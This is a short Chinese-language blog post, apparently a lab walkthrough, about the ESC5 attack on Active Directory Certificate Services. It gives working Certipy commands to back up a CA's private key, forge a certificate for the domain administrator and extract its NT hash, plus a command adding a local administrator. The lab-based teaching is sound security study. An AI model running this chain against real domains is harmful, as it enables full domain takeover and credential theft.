深入剖析ESC5:利用ADCS配置不当进行Active Directory渗透测试

摘要

继我之前写的ESC4文章之后——现在我的工作已经完成,终于有更多时间学习了,我觉得也应该深入研究一下ESC5。说实话,我不知道为什么,尽管在印度尼西亚的真实环境中还比较少见,但学习Active Directory利用技术感觉要刺激得多。可能只是我理想主义的一面在作祟,哈哈哈。好了,让我们开始一起学习吧。

什么是ESC5

ESC5是一种针对Active Directory证书服务的攻击。这种攻击利用了用户对证书颁发机构的访问权限。如果攻击者获得了CA服务器上的本地管理员权限,就可以提取CA证书及其私钥。利用该私钥,攻击者可以为特权账户伪造恶意证书。这些伪造的证书随后可用于通过PKINIT向AD进行身份验证,并请求TGT。

搭建实验室环境

在CA服务器上创建一个任意名称的账户,并将该账户添加为本地管理员:

net localgroup Administrators "igniteraj" /add
net localgroup Administrators

枚举与漏洞利用

在CA服务器上,使用本地管理员账户通过Certipy枚举证书。

使用Certipy备份CA证书和私钥。

certipy ca-backup -u alex.doe@sandbox.local -p "MyPassword123" -ca ignite-DC-CA -target 10.100.150.10

伪造我们想要接管的账户——本例中是administrator@sandbox.local,因为它是目标上的域管理员。

certipy forge -ca-pfx 'sandbox-ca.pfx' -upn administrator@sandbox.local

使用Certipy获取administrator@sandbox.local账户的NT哈希。

certipy auth -pfx administrator_forged.pfx -dc-ip 10.100.150.10

使用SecretDump导出哈希凭据。

参考文献

公众号二维码

公众号二维码

posted @ 2025-12-14 11:16  qife  阅读(0)  评论(0)    收藏  举报